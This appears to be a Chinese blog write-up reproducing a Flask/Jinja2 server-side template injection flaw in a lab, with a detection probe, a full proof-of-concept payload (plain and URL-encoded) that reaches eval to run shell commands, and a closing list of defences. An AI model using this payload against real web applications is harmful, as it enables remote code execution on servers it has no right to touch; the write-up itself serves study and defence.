Flask (Jinja2) 服务端模板注入漏洞复现

文章目录

  • [Flask (Jinja2) 服务端模板注入漏洞](#Flask (Jinja2) 服务端模板注入漏洞)
    • [1.1 漏洞描述](#1.1 漏洞描述)
    • [1.2 漏洞原理](#1.2 漏洞原理)
    • [1.3 漏洞危害](#1.3 漏洞危害)
    • [1.4 漏洞复现](#1.4 漏洞复现)
      • [1.4.1 漏洞利用](#1.4.1 漏洞利用)
    • [1.5 漏洞防御](#1.5 漏洞防御)

Flask (Jinja2) 服务端模板注入漏洞

1.1 漏洞描述

说明 内容
漏洞编号
漏洞名称 Flask (Jinja2) 服务端模板注入漏洞
漏洞评级 高危
影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Flask模块中几乎都存在注入漏洞。
漏洞描述 Flask 是一个流行的 Python Web 框架,而 Jinja2 是其默认的模板引擎。服务端模板注入漏洞发生在应用程序使用模板引擎渲染用户提供的数据时,未能正确过滤或转义用户输入,导致攻击者可以注入自己的模板代码,从而执行恶意操作。
修复方案 打补丁,上设备,升级组件

1.2 漏洞原理

在模板引擎中,开发者可以使用特定的语法将数据与模板结合生成最终的输出。然而,如果在这个过程中,直接使用用户提供的数据而没有进行适当的过滤或转义,攻击者就可以注入恶意模板代码。

攻击者可以构造恶意的输入,在用户输入中包含模板标记(如 {``{}}),以控制模板引擎的行为。模板引擎会将用户提供的数据作为代码来执行,导致恶意代码执行在服务端上下文中。

1.3 漏洞危害

服务端模板注入漏洞可能导致以下危害:

  1. 执行任意服务器端代码:攻击者可以在服务器上执行任意的代码,包括读写敏感文件、访问数据库、远程命令执行等操作。
  2. 盗取敏感信息:攻击者可以通过读取服务器端数据,包括数据库中存储的敏感信息(如用户凭据、个人信息等)。
  3. 服务器端拒绝服务(DoS):攻击者可以构造恶意输入,导致服务器资源耗尽或崩溃,从而使服务不可用。

1.4 漏洞复现

环境启动

访问http://your-ip/?name={``{233*233}},得到54289,说明SSTI漏洞存在。

1.4.1 漏洞利用

获取eval函数并执行任意python代码的POC:

python 复制代码
{% for c in [].__class__.__base__.__subclasses__() %}
     {% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {undefined{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

放在url中需要编码,编码后的结果

{%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}{%%20if%20b.__class__%20==%20{}.__class__%20%}{%%20if%20%27eval%27%20in%20b.keys()%20%}{{%20b[%27eval%27](%27__import__(%22os%22).popen(%22id%22).read()%27)%20}}{%%20endif%20%}{%%20endif%20%}{%%20endfor%20%}{%%20endif%20%}{%%20endfor%20%}

然后我们执行,发现命令执行成功。

1.5 漏洞防御

漏洞防御: 以下是一些防御措施来预防 Flask(Jinja2)服务端模板注入漏洞:

  1. 输入验证与过滤:应该对用户提供的输入进行验证,并确保它符合预期的格式和类型。同时,在将用户输入传递给模板引擎之前,必须进行适当的过滤和转义处理。
  2. 不信任用户输入:永远不要相信用户提供的输入数据,即使是在内部使用也要进行验证和转义处理。
  3. 使用安全的模板引擎配置:使用模板引擎时,应该仔细配置其安全选项,以限制模板中可执行的操作和访问的对象。
  4. 最小权限原则:为应用程序和服务器分配最低权限,以降低攻击者成功利用漏洞的可能性。
  5. 定期更新框架和库:及时更新 Flask 和 Jinja2 等相关库,以获取最新的安全修复和补丁。
相关推荐
CrazyCosin12 分钟前
Clip结合Faiss+Flask简易版文搜图服务
python·flask·faiss
Suckerbin32 分钟前
DVWA靶场通关——SQL Injection篇
sql·网络安全
洛祁枫1 小时前
centos7 升级openssl 与升级openssh 安装卸载 telnet-server
linux·服务器·安全·网络安全·centos
江苏思维驱动智能研究院有限公司2 小时前
特权帐户安全 CyberArk
网络·数据库·安全·web安全
布兰妮甜2 小时前
HTTP 安全头配置:如何配置 HTTP 安全头来保护应用
数据库·安全·http
Canon_YK2 小时前
响应“一机两用”政策 落实政务外网安全
运维·网络·安全·web安全·网络安全
it技术分享just_free4 小时前
软考教材重点内容 信息安全工程师 第 3 章 密码学基本理论
网络安全·信息安全·密码学·软考
iamBailey4 小时前
flask+vue使用jwt验证
vue.js·python·flask
LNTON羚通4 小时前
入侵检测算法平台部署LiteAIServer视频智能分析平台行人入侵检测算法:科技守护安全的新篇章
科技·安全·目标检测·音视频·视频监控
搭贝4 小时前
安全生产管理的重要性:现状、痛点与改进之路
安全·低代码